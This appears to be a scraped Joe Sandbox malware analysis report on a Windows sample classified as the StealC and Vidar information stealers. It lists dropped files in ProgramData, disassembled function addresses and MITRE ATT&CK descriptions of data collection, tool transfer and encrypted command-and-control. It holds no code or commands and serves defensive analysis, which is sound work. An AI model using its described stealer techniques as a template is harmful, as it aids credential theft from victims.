Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report file.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: StealC

Threatname: Vidar

Yara Signatures

PCAP (Network Traffic)

Memory Dumps

Unpacked PEs

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Spreading

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\AFIEGCAECGCAEBFHDHIE

C:\ProgramData\DGHDHIDG

C:\ProgramData\EGDGIIJJ

C:\ProgramData\FCAFIJJJKEGIECAKKEHIDHDAKK

C:\ProgramData\FHJDGHIJDGCBAAAAAFIJDAECGH

C:\ProgramData\HCAAEBKEGHJKEBFHJDBFCFBKKJ

C:\ProgramData\IIJEBAECGCBKECAAAEBF

C:\ProgramData\JJDGCGHCGHCBFHJJKKJEHJEHJE

C:\ProgramData\KFCFIEHCFIECBGCBFHIJ

C:\ProgramData\freebl3.dll

C:\ProgramData\mozglue.dll

C:\ProgramData\msvcp140.dll

Windows Analysis Report
file.exe

Function 00999860 Relevance: 59.7, APIs: 33, Strings: 1, Instructions: 212
libraryloaderCOMMON

Function 009845C0 Relevance: 56.1, APIs: 2, Strings: 30, Instructions: 148
memoryCOMMON

Function 0098BE70 Relevance: 37.4, APIs: 17, Strings: 4, Instructions: 675
fileCOMMON

Function 6CC935A0 Relevance: 37.0, APIs: 16, Strings: 5, Instructions: 294
stringtimeCOMMON

Function 00994910 Relevance: 36.9, APIs: 18, Strings: 3, Instructions: 172
fileCOMMON

Function 00984880 Relevance: 28.5, APIs: 11, Strings: 5, Instructions: 479
networkstringfileCOMMON

Function 00999C10 Relevance: 200.2, APIs: 112, Strings: 2, Instructions: 684
libraryloaderCOMMON

Function 00987710 Relevance: 81.6, APIs: 54, Instructions: 584
stringmemoryCOMMON

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre